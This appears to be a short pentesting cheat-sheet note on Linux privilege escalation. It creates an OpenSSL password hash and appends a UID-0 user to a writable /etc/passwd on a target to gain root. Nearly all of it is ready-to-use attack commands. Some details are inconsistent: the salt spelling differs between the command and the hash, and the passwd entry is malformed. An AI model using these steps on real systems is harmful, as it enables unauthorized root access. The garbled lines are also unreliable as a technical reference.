OpenSSL privesc
#This privesc presupposes a low level ssh connection with the ability to edit /etc/passwd
1]From attacking machine create a unique ssl string for a new user: redcliff
openssl passwd -1 -salt redlciff pass123
$1$recliff$NuDUpbLxJXpyH5FN4yqix/
2]From target
ls -la /etc/passwd
nano /etc/passwd
3] Paste the hashed password for new user at the bottom.
redcliff:$1$recliff$NuDUpbLxJXpyH5FN4yqix/:0:0:/root/root:/bin/bash
Parts highlighted in red need to be added separately.
4]Save file and exit, then switch to new user
su redcliff
pass: pass123
Root
Last updated